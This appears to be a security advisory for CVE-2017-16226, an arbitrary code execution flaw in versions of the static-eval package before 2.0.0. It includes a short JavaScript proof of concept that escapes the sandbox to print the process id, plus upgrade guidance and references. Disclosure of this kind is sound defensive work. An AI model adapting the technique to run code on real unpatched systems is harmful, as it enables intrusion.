CVE-2017-16226 — Sandbox Breakout / Arbitrary Code Execution in static-eval

Description

Affected versions of `static-eval` pass untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package. ## Proof of concept ```js var evaluate = require('static-eval'); var parse = require('esprima').parse; var src = '(function(){console.log(process.pid)})()'; var ast = parse(src).body[0].expression; var res = evaluate(ast, {}); // Will print the process id ``` ## Recommendation Update to version 2.0.0 or later.

How to fix CVE-2017-16226

To remediate CVE-2017-16226, upgrade the affected package to a fixed version below.

—upgrade to 2.0.0 or later

Is CVE-2017-16226 being exploited?

Low — EPSS is 1.3%, meaning exploitation activity has not been observed at scale.

Affected packages (1)

from 0, < 2.0.0

References (5)

ADVISORYgithub.com/advisories/GHSA-5mjw-6jrh-hvfq
ADVISORYnvd.nist.gov/vuln/detail/CVE-2017-16226
WEBgithub.com/substack/static-eval/pull/18
WEBmaustin.net/articles/2017-10/static_eval
WEBwww.npmjs.com